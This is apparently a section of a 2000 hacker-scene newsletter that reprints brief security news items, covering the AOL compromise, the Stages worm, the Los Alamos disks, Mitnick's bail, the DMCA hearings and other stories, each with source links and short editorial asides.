~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Macki

The court has finally released the recent depositions of MPAA Chief Jack Valenti (taken on 6/6), the two-day deposition of MPAA Anti-Piracy Chief Kenneth Jacobsen (taken on 5/17 and 5/18), as well as the transcripts of last week's hearing on public access to these and other depositions (held on 6/6) and the hearing on discovery issues (held on 6/8). Future documents and transcripts will be posted as soon as they become available. Audio and video transcripts of the Valenti deposition will hopefully be posted soon.

2600.com
http://www.2600.com/

@HWA

168.0 [HNN] June 15'00 Raytheon Unveils SilentRunner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

Defense contractor Raytheon Co. yesterday unveiled "SilentRunner", what it calls the vanguard of network monitoring. At $65,000 a pop the software is designed to monitor internal network traffic and analyze communications patterns to detect when proprietary information is leaving the company.

Associated Press - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500216198-500306527-501702299-0,00.html

@HWA

169.0 [HNN] June 15'00 30 year Old Security Report Still Useful
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by maggie d

A report published by the Rand Corporation in 1970 for the Advanced Research Projects Agency was declassified in 1975. The report, entitled Security Controls for Computer Systems, details appropriate computer security safeguards that would protect classified information in multi-access, resource-sharing computer systems.
While written in 1970 and declassified in 1975, this document still has valuable comprehensive information regarding networked multi user machines. (Even with more and more technology the basic security principles still apply. People just keep making the same mistakes.)

Linux Security
http://www.linuxsecurity.com/resource_files/documentation/R609.1.html

@HWA

170.0 [HNN] June 15'00 15 yr old Receives Classified Documents
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Maggie and Apocalyse Dow

Claire McDonald, 15, of Devon, England, has been receiving e-mails for the past six months that she believed came from the Pentagon in the United States. Over 250 emails in all, containing classified information, were mailed from Royal Navy Commander Jim Dale, intended for RNC Jamie Hay. Dale, who works in the US at the Pentagon, was contacted by the girl when she started receiving the emails. He told her to contact her ISP and continued to send the classified information.

Fairfax IT
http://www.it.fairfax.com.au/breaking/20000615/A8896-2000Jun15.html

@HWA

171.0 [HNN] June 15'00 Underground Tools
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by rfp

Network Computing magazine takes a stab at describing some of the more popular tools used by the underground.

Network Computing
http://www.nwc.com/1110/1110ws1.html

@HWA

172.0 [HNN] June 16'00 Political Candidates Deface Web Pages
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Crystal

It started when Democratic candidate Maria Cantwell's campaign workers linked to a picture of their opponent, Sen. Slade Gorton, R-Wash., in a very humorous pose on their web site. The Cantwell camp evidently only linked to the photo on the Gorton site. Workers for Sen. Gorton then changed the picture to something more flattering. Now Gorton's campaign is accusing Cantwell, a dot-com executive, of stealing intellectual capital, high-tech hacking and hijacking his server.
(Linking to a picture is now considered stealing intellectual capital? Yeah, I want this guy in office.)

Seattle Times
http://archives.seattletimes.com/cgi-bin/texis/web/vortex/display?slug

@HWA

173.0 [HNN] June 16'00 Mitnick Seeks to Renew Ham License
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Vapor

An entry in the June 7, 2000 FCC Enforcement Logs shows that Kevin Mitnick (N6NHG) & his legal counsel are in the process of renewing his General Class ham radio license. Kevin's attorney, R. Gregory Adlin, argues that ham radio operation will not violate his parole conditions. FCC Special Counsel for Amateur Radio Enforcement Riley Hollingsworth states that Mitnick's current license remains valid while he and his lawyer gather documentation to prove that operating ham radios will not violate his parole.

ARRL
http://www.arrl.org/news/enforcement_logs/2000/0607.html

@HWA

174.0 [HNN] June 16'00 Value of Microsoft Trash On the Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by McIntyre

Not really sure what to make of this story or what exactly is going on, but it seems that someone is trying to buy the unshredded trash of the Association for Competitive Technology (ACT), which is closely aligned with Microsoft. In an unrelated incident Microsoft's Dupont offices were broken into earlier this week but nothing was found missing.

Wired
Wall Street Journal
http://www.wired.com/news/politics/0,1283,37022,00.html
http://interactive.wsj.com/articles/SB961105810825579561.htm

@HWA

175.0 [HNN] June 16'00 China Sentences Man to Death
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

Fang Yong embezzled about 1.66m yuan (about 200,000 US dollars) of public money from the Bank of Communications of China by counterfeiting bank paper and transferring money from people's accounts from May to August 1990.
The 36-year old "hacker" was sentenced to death here recently by the Ningbo Intermediate Court in East China's Zhejiang Province. This is the most severe punishment that a Chinese judicial organization has given to a "cyber criminal". (Hacker? Cyber Criminal? Let's try Forger and Embezzler; those words are much more descriptive. Oh, but they aren't as sensationalistic, sorry.)

BBC - via Lexis-Nexis
http://web.lexis-nexis.com/more/cahners-chicago/11407/5955809/4

@HWA

176.0 [HNN] June 16'00 OpenBSD 2.7 Now Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by White Vampire

OpenBSD 2.7 has been released. OpenBSD has gone three years without a remote vulnerability in the default installation and two years without a localhost vulnerability in the default installation. This is arguably the most secure operating system available. And guess what? It's free.

Open BSD
http://www.openbsd.org/27.html

@HWA

177.0 [HNN] June 16'00 RootFest Ends Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

The last day of RootFest, the largest security convention in the Midwest, ends today. Live audio and video is available.

RootFest
St. Paul Pioneer Press
http://www.rootfest.org/
http://www.pioneerplanet.com/yhoo/mtc_docs/027786.htm

@HWA

178.0 [HNN] June 16'00 White Paper: Internet Identity Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

The Software and Information Industry Association, a trade group representing more than 1,000 high-tech companies, has released a white paper that details how consumers can prevent identity theft in cyber space. It is hoped that informing the public will help prevent cyber fraud and misused card numbers, and improve consumer confidence in shopping online.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2588919,00.html

Internet Identity Theft: A Tragedy For Victims
http://www.siia.net/sharedcontent/divisions/ebus/id_theft.pdf

@HWA

179.0 [HNN] June 16'00 New Ezines
~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by syztrix and Cyber0ptix

We forgot to mention it earlier, but b0g has released its fifth issue. Also just released is issue 4 of 0blivion Mag.

B0g
http://www.b0g.org

0blivion
http://www.0blivion.org

@HWA

180.0 [HNN] June 19'00 AOL Confirms Compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by mortel

America Online confirmed Friday that some of their employee accounts have been compromised by attackers, and that the accounts were used to gain access to and view details of some personal user accounts. This was accomplished via a trojan that was placed on AOL employees' machines.

(This is not the first time AOL has been compromised, it's just getting more press this time.)

Observers UK has posted a few articles that are a little bit more technical and offer a glimpse inside the setup of the AOL network. They talked with Retired, who offers a step by step method of accessing the internal AOL network.
Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000616/tc/aol_hacked_1.html

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000616/wr/aol_hackers_dc_1.html

ABC News
http://abcnews.go.com/sections/tech/DailyNews/aol000616.html

CNN
http://www.cnn.com/2000/TECH/computing/06/17/aol.hacker.01/index.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2589679,00.html

AOL naps while hackers attack
http://www.observers.net/securecris.html

CRIS access: The Mecca of ao-haxors
http://www.observers.net/crisreply.html

@HWA

181.0 [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by evenprime

After Microsoft and Omni Tech donated software and computers to the Suburban Law Enforcement Academy of the College of DuPage in Naperville, Illinois, the marketing machines of Omni Tech and the academy started making claims that "every class they've ever held, they actually catch someone in an act of perpetrating a crime..." Lewis Koch of zdnet attempted to verify these claims, but school officials would not give him any examples, and the DuPage County prosecutor's office couldn't provide any corroborating reports. School officials refused to explain this disparity. They also refused to discuss the qualifications of the staff to teach computer crime courses or the curriculum, or to let Koch view the course.

ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,2588873,00.html

@HWA

182.0 [HNN] June 19'00 Los Alamos Hard Drives Found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Dave

Two missing computer hard drives containing sensitive nuclear weapons data from the Los Alamos National Laboratory have been recovered, federal authorities announced Friday. The drives were found behind a copy machine that had already been searched once. Officials say they will continue to investigate the matter to determine if the data has been compromised.
CNN
http://www.cnn.com/2000/ALLPOLITICS/stories/06/16/losalamos.disks/index.html

Reuters - via C|Net
http://news.cnet.com/news/0-1003-200-2093750.html?tag

@HWA

183.0 [HNN] June 19'00 Japanese Exercise CyberCrime Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by evenprime

Japanese authorities on the northern island of Hokkaido have arrested a man they say unlawfully penetrated the firewall of a Web site, the fifth such arrest since a new cyber crime law went into effect earlier this year.

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2589803,00.html?chkpt

@HWA

184.0 [HNN] June 19'00 Anti Pedophile Groups Take on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by evenprime

Antichildporn.org, condemmend.org, and EHAP are all searching for pedophiles in an attempt to remove them and their content from the net. While some of the methods they use may not be ethical, they say they are all legal.

(Unfortunately there is no way to verify how effective these groups are.)

ABC News
http://abcnews.go.com/sections/tech/DailyNews/antiporn000616.html

@HWA

185.0 [HNN] June 19'00 More E-Zines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by L33t Dawg

Issue #6 of Hack In The Box's zine is ready and available. HAO has released its premier E-zine, titled (EnLighten2000). The new E-zine has a news, windows, mac, linux, and info section. Also HWA.hax0r.news has released issue #53.

Hack In the Box
http://www.hackinthebox.org

HAO
http://www.hao.org

HWA.hax0r.news
http://welcome.to/HWA.hax0r.news/

@HWA

186.0 [HNN] June 20'00 Stages Virus Starts to Become Widespread
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

Just another copycat trojan/worm is making the rounds of corporations in the US, Australia, Asia, and elsewhere. Like ILOVEYOU, the latest virus automatically sends copies to everyone listed in the Microsoft Outlook program's address book.
Both viruses can also spread through chat rooms. The new virus uses a Windows feature called Shell Scrap Object to activate. The virus carries an ".shs" suffix, but Windows computers are generally configured to hide the suffix, making the file appear to contain only text. The virus appears to be written by Zulu, the same person that is believed to have written the Bubbleboy virus that appeared last year.

Associated Press - via Canada.com
http://www.canada.com/cgi-bin/cp.asp?f

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2590403,00.html

VBS_Stages.A - via Trend Micro
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName

@HWA

187.0 [HNN] June 20'00 Employees Sue Employer For Firing Over NetBus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by RenderMan

About a year ago two gentlemen in New Zealand were evaluating Netbus Pro for tech support use, and because of this they were fired by their employer. They are now taking their employer to court. With recent changes to the treatment of Netbus, this case should be interesting in establishing what truly makes some code malicious. In one of the defendants' own words he writes about the events that led up to this, and Renderman looks at the issue of the power that Anti-Virus definitions can wield.

Defendants' own words
http://www.antiav.com/NZrant.html

RenderMan's summary and background
http://www.antiav.com/NZcase.html

@HWA

188.0 [HNN] June 20'00 The Cyberterror Scare of 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

So where is the "electronic pearl harbor" that is supposed to cripple the US Internet Infrastructure? Last year experts were warning about malicious code being hidden as Y2K fixes; it is now June and nothing has happened. Kevin Poulsen takes a look at these and other questions in his latest article.
Security Focus
http://www.securityfocus.com/templates/article.html?id

@HWA

189.0 [HNN] June 20'00 AOL Increases Network Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by q bahl

AOL has revealed that intruders accessed their system by targeting specific employees with Trojan-laden email attachments. AOL said that about 200 accounts total had been compromised but that they have increased their security level in the wake of the intrusion. AOL has said that it will involve law enforcement once its internal investigation is completed.

C|Net - via Yahoo
http://dailynews.yahoo.com/h/cn/20000619/tc/aol_boosts_email_security_after_attack_1.html

@HWA

190.0 [HNN] June 20'00 Poll Says Americans Are Afraid of CyberCrime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

A poll released Monday at a conference of technology executives and law enforcement officials claims that two thirds of Americans are concerned about the threat of cybercriminals. The poll was commissioned by EDS and the Information Technology Association of America. The poll included the responses of 1000 people.

(1,000 people speak for the entire country?)

Associated Press
http://dailynews.yahoo.com/h/ap/20000619/tc/cybercrime_2.html

@HWA

191.0 [HNN] June 20'00 Cyber Defense Still Looked at As Part of Cold War
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

Sen. Charles Schumer (D-N.Y.) at a recent symposium blamed current cyber defense spending on the Cold War mentality. Other officials echoed these concerns, saying that without an electronic Pearl Harbor it was difficult to convince leaders to spend the required moneys.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0619/news-dfnse-06-19-00.asp

@HWA

192.0 [HNN] June 20'00 FAA Opens Cyber Security Office
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

Raymond Long hopes to plug the holes in the Federal Aviation Administration's network that may be at risk of intrusion, both in nationally deployed systems and systems unique to each airport. The office was officially opened in May and has been headed by Mr. Long, who was the FAA's Y2K czar.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0619/pol-isec-06-19-00.asp

@HWA

193.0 [HNN] June 21'00 Credit Taken for Stages Worm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Bruce Hughes, a manager at ICSA.net, believes he has identified the author of the Stages Worm. 'Zulu' is believed to live in Argentina, speaks Spanish and English, and has written several virus/worms including Bubbleboy, Monopoly, FreeLinks, and others. The FBI has been reported as investigating the case.

Reuters - via Nando Times
http://www.techweb.com/wire/story/reuters/REU20000620S0009

Reuters - via Fox News
http://www.foxnews.com/vtech/0620/t_rt_0620_33.sml

@HWA

194.0 [HNN] June 21'00 Drug Office Tracks Web Visitors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Banner

The White House Office of National Drug Control Policy has cookie-enabled the ad banners that are used in its anti-drug media campaign. The banner ads direct users to Freevibe.com, a site sponsored by the Drug office. The office says that the cookies are just a method of tracking its ad campaign and were not meant to track users, and that the information would not be sold or given to third parties. However, the ad campaign is being controlled by Doubleclick, which has come under serious fire for collating web surfers' information and violating users' privacy.
Scripps Howard News Service
http://shns.scripps.com/shns/story.cfm?pk

@HWA

195.0 [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

NATO scientists at the Kfor peacekeeping force headquarters in Pristina, Kosovo created a virus that would secretly email documents from victims' hard drives. Unfortunately the virus escaped into the wild and is being blamed for leaking a nine-page document detailing the rules of engagement for NATO soldiers to the press. The virus is called 'Anti-Smyser 1' and is alleged to be a variation of a MS Word macro virus known as THUS.Q.

The Times UK
http://www.the-times.co.uk/news/pages/sti/2000/06/18/stinwenws01024.html

@HWA

196.0 [HNN] June 21'00 Mexico Hires Hackers To Crack Password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

The Mexican leftist Democratic Revolution Party (PRD) is trying to crack the password to a secret list of beneficiaries of a controversial $100 billion bank bailout that followed a currency crisis in 1994 and 1995. Four of the five passwords that protect the data are known and they are working on the last one. The party has hired 'hackers' to help them with the task.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000620/wr/mexico_hackers_dc_1.html

@HWA

197.0 [HNN] June 21'00 Privacy Issues Get Attention In Congress
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

About 300 privacy bills are pending in both the House and Senate. While most appear to be election year pandering, they are starting to attract attention. The debates are centering around the opt-out or opt-in methodologies of collecting personal information.
Boston Globe - Computer News Daily
http://199.97.97.16/contWriter/cnd7/2000/06/20/cndin/9395-0023-pat_nytimes.html

@HWA

198.0 [HNN] June 21'00 More Speakers for H2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by macki

Hope 2000 has added a new round of speakers and panels in preparation for the July 14-16 conference in New York City.

H2K
http://www.h2k.net/panels.html

@HWA

199.0 [HNN] June 22'00 White House Supports P3P
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Scully

The White House has come out in support of the World Wide Web Consortium's Platform for Privacy Preferences Project standard. P3P will work within a web browser and interact with a web site automatically. The browser will follow the preferences set by the user and warn the user if the web site attempts to violate those preferences. Privacy advocates disagree and feel that the P3P standard will allow web sites even more access to personal information than they have now.

(It does sound like another election year bull shit ploy, but we'll see.)

The White House - Office of the Press Secretary
http://usinfo.state.gov/cgi-bin/washfile/display.pl?p

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2591856,00.html

Electronic Privacy Information Center - Pretty Poor Privacy: An Assessment of P3P and Internet Privacy
http://www.epic.org/reports/prettypoorprivacy.html

@HWA

200.0 [HNN] June 22'00 FSA Calls Bank Security Weak
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

The Financial Services Authority (FSA), the UK's financial services regulator, has told banks that they must take more care with their online security. The FSA said there was a high risk with new IT employees because adequate background checks were not being performed, and that while banks tend to have reasonable perimeter security, they often found insufficient segregation between internal and external systems, as well as poor internal security in general.
Newsbytes
http://www.newsbytes.com/pubNews/00/150881.html

@HWA

201.0 [HNN] June 22'00 Nike.com Redirected
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

A group known as S-11 redirected the nike.com home page to a site calling for action at the World Economic Forum 2000 on Sept. 11-13 in Melbourne, Australia. Nike technicians have regained control of the site and have launched an internal investigation.

Attrition.org - Mirror
http://www.attrition.org/mirror/attrition/2000/06/21/www.nike.com/

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000621/tc/nike_hackers_1.html

Nando Times
http://www.nandotimes.com/technology/story/0,1643,500219236-500312244-501742874-0,00.html

@HWA

202.0 [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

A new regulation within China prevents Cybercafes from operating within 200 meters of schools, forcing many to close. Police in Xiamen, in China's Fujian province, have shut down 45 Internet cafes in the city. The city's Public Security Bureau insisted it must increase its role as an "Internet policeman".

The UK Register
http://www.theregister.co.uk/content/1/11480.html

@HWA

203.0 [HNN] June 22'00 Freeware Available to Track Napster Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The release of Media Enforcer now puts the power of NetPD into the hands of everyone. This freeware application can track users, IP addresses, tracks traded and other information of both Napster and Gnutella users. Since the software can also be used to find MP3s, the author insists on a personal email before releasing the full version.
ZD Net
http://music.zdnet.com/features/enforcer/?chkpt

Media Enforcer
http://mediaenforcer.tripod.com/enforcer/index.html

@HWA

204.0 [HNN] June 22'00 ECTF labeled Cyber-Mod Squad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Space Rogue

The Electronic Crimes Task Force, a collaboration of local, state and national law enforcement groups headed by the New York office of the Secret Service, has been called a 240 person "cyber-mod squad". It would appear however that the group deals mostly with cloned cell phones, identity thefts and stolen credit cards, with an actual cybercrime thrown in here and there.

(Just because a criminal uses the Internet does not make it a cybercrime.)

Computer World
http://www.computerworld.com/cwi/story/0,1199,NAV47_STO45927,00.html

@HWA

205.0 [HNN] June 22'00 Eleven Story Tall Tetris Game
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Lady Sharrow

Definitely a hardware hack if there ever was one. Members of Technology House at Brown University created La Bastille, an eleven story Tetris game. It contains eleven custom-built circuit boards, a twelve-story data network, a personal computer running Linux, a radio-frequency video game controller, and over 10,000 Christmas lights. La Bastille transforms Brown's fourteen-story Sciences Library into a giant video display which allows bystanders to play a game of Tetris that can be seen for several miles.

Tech House
http://www.techhouse.org

@HWA

206.0 [HNN] June 23'00 DMCA Hearings Held By US Copyright Office
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Weld Pond

The US Copyright office has been holding hearings regarding exemptions to the Section 1201 ban on circumvention of access control technologies, enacted by the Digital Millennium Copyright Act in 1998. This prohibition on circumvention becomes effective on October 28, 2000.
In the meantime, the Copyright Office will hold hearings to determine whether there are particular classes of copyrighted works that shall be exempted from the prohibition due to the inability of users to use the works in a noninfringing way.

Cryptome
http://cryptome.org/dmca-hearings.html

US Copyright Office
http://www.loc.gov/copyright/1201/anticirc.html

@HWA

207.0 [HNN] June 23'00 COPA Appeal Rejected!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Weld Pond

The 3rd U.S. Circuit Court of Appeals in Philadelphia has upheld lower court rulings that say that the Child Online Protection Act of 1998 is unconstitutional. The three judge panel said in a rather scathing opinion that the measure was so unconstitutionally broad it affected even non-pornographic websites. The Justice Department still has the ability to appeal to the Supreme Court, get the case remanded for trial, or give up.

Wired
http://www.wired.com/news/politics/0,1283,37171,00.html

US Courts - Judges' decision
http://pacer.ca3.uscourts.gov/recentop/week/991324.txt

@HWA

208.0 [HNN] June 23'00 Mitnick Back In Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by macki

On Monday June 26 Kevin will head back to court for a clarification of the terms of his bail. At issue are the terms "consultant or advisor", which are mentioned within Kevin's bail conditions as activities that he is prohibited from doing. Kevin feels that giving talks to various groups, including the US Senate, does not violate this provision.

FREE KEVIN
http://www.freekevin.com

@HWA

209.0 [HNN] June 23'00 Security Glitch Brings Lawsuit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by renderman

An Edmonton man found a way to beat the odds. Zues Yaghi found a glitch in the programming of certain slot machines. The manufacturer, WMS Gaming Inc. of Chicago, has launched a $10-million lawsuit against him.
(Why does this reaction sound like that of any one of a number of security glitches and bugs found in the computer security world? Security by obscurity does not work. Of course, with Defcon just around the corner I'm sure a lot of people would like to know what this glitch is.)

Edmonton Journal
http://www.edmontonjournal.com/stories1/000622/4325404.html

@HWA

210.0 [HNN] June 23'00 UAE Files Charges Against British Worker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

A British man working in the United Arab Emirates has been accused of breaking into various computer systems and 'damaging the economy'. The man's activities had been traced by the Emirates Telecommunications Corp (Etisalat) network security staff. UAE has no specific laws regarding computer attacks, but a charge of 'damaging the economy' carries a maximum penalty of ten years.

Reuters - via Excite
http://news.excite.com/news/r/000622/04/net-emirates-hacker-dc

@HWA

211.0 [HNN] June 23'00 Feedback on Female Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Weld Pond

ABC received so much feedback from its original story about women in the underground that it has decided to publish some of those comments, which for the most part are pretty good.

ABC News
http://abcnews.go.com/sections/tech/DailyNews/hackerfeedback_000619.html

@HWA

212.0 [HNN] June 23'00 Online Retailers Don't Provide Adequate Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

A study entitled "Top of the E-Class: Ranking and Best Practices of over 170 Web Sites" found that on-line retailers fail to provide shoppers with adequate security and privacy protection.
The report, commissioned for Ryerson Polytechnic University's Center for the Study of Commercial Activity, found a full third of retailers did not even meet minimum security standards.

The Globe and Mail
http://www.globetechnology.com/archive/gam/News/20000622/RSECU.html

@HWA

213.0 [HNN] June 23'00 Better to Be Scared Than Sorry?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by newbie

While administrators and users need to treat all reports of every threat seriously, this article seems to suggest that crying wolf is in itself acceptable. It should be the responsibility of the security industry to verify that its information is absolutely correct before informing the media. Creating a nationwide cyber panic over a threat that does not exist is not helpful, does not heighten awareness, and does not increase security. Instead it wastes time, desensitizes users, and costs corporations money.

Computer World - via CNN
http://www.cnn.com/2000/TECH/computing/06/21/security.warning.idg/index.html

@HWA

214.0 [HNN] June 23'00 Snooping Enters the Mainstream
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

With the low cost availability of software that allows keystroke recording, many people are finding just how easy it is to snoop on someone else. Spyware is becoming all the rage with spouses who suspect cheating, parents who suspect anything, and employers who want to check up on their employees.

NY Times
http://www.nytimes.com/library/tech/yr/mo/circuits/articles/22pete.html

@HWA

215.0 [HNN] June 26'00 24,000 Credit Card Numbers At Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

A pioneering internet service provider in England has become the victim of an online attack. Redhotant lost its entire customer database, which included names, addresses, passwords and credit card numbers.
The ISP has denied that the break-in has occurred, but a security consultant has told The Times UK that he was able to access the database.

The Times UK
http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.html

@HWA

216.0 [HNN] June 26'00 Russians Introduce Cyber Doctrine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

President Vladimir Putin's powerful Security Council has approved an 'information security doctrine' to strengthen the government's role in monitoring information flow within Russia. The unpublished doctrine is supposed to protect journalists' rights, crack down on cybercrime and support the telecom industry.

Associated Press - via The Age
http://www.theage.com.au/breaking/0006/24/A30741-2000Jun24.shtml

@HWA

217.0 [HNN] June 26'00 Mitnick In Court Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Sarge

Kevin Mitnick will return to court today in an effort to clarify his bail conditions. When released from jail earlier this year he was told that he could not 'consult' on computer related matters. It is hoped that he will be able to convince the judge that lectures and writing a column for an online magazine do not constitute 'consulting'.

Reuters - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2593948,00.html

@HWA

218.0 [HNN] June 26'00 More Info Reported Missing At Los Alamos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

An audit of classified information at Los Alamos turned up two 10-year-old floppy disks missing. The disks were found the next day. The audit also found an equipment closet unlocked inside a secure room. The Department of Energy will be investigating both events.

(Ten year old floppies? Hello? Floppies are only valid for approximately six months.)
APB News
http://www.apbnews.com/newscenter/breakingnews/2000/06/24/losalamos0624_01.html

@HWA

219.0 [HNN] June 26'00 The HoneyNet Research Project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Al

A pretty unconventional research paper was recently released which focuses on an examination of black-hat activity following the compromise of a honeynet setup. This paper is the result of the work and research of the Honeynet Project, and shows detailed keystroke logs of everything that these unsuspecting blackhats did to hack and maintain root on the system, as well as full transcripts of their IRC sessions while they were being watched. The Honeynet Project estimates that over 370 other systems were compromised in this two-week period by the same individuals.

Security Focus
http://www.securityfocus.com/frames/?focus

@HWA

220.0 [HNN] June 26'00 Cell Phones And Driving Don't Mix
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

Singapore, known for its strict anti-littering and anti-chewing gum laws, now plans to jail motorists who hold mobile phones to their ears while driving. Violators face a six-month jail term for a first offense or a S$1,000 ($588 U.S.) fine, or both, and a driving ban. A second offense would double the fine and jail term.

(Hang up and drive.)

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2593947,00.html?chkpt

@HWA

221.0 [HNN] June 26'00 New Viruses Attack The Soul
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

It is no longer a question of what a virus does but how it gets the user to execute it. How well the software social engineers the user into executing the email attachment is the critical step in getting an email virus to propagate widely.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2593514,00.html

@HWA

